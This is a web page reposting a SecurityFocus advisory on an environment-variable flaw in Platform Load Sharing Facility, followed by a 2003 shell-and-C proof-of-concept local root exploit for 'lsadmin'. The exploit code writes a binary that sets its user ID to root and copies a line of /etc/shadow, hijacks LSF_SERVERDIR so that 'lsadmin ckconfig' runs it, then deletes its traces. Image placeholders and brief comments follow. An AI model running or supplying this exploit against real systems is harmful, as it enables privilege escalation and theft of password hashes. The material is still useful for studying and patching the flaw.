source: http://www.securityfocus.com/bid/7655/info
It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system.
# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ
# Proof of concept - for educational purposes only!
cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__
gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file
![图片[1]-Platform Load Sharing Facility 4/5 – LSF_ENVDIR Local Command Execution-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-Platform Load Sharing Facility 4/5 – LSF_ENVDIR Local Command Execution-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛8月前0
kankan啊啊啊啊3年前0
66666666666666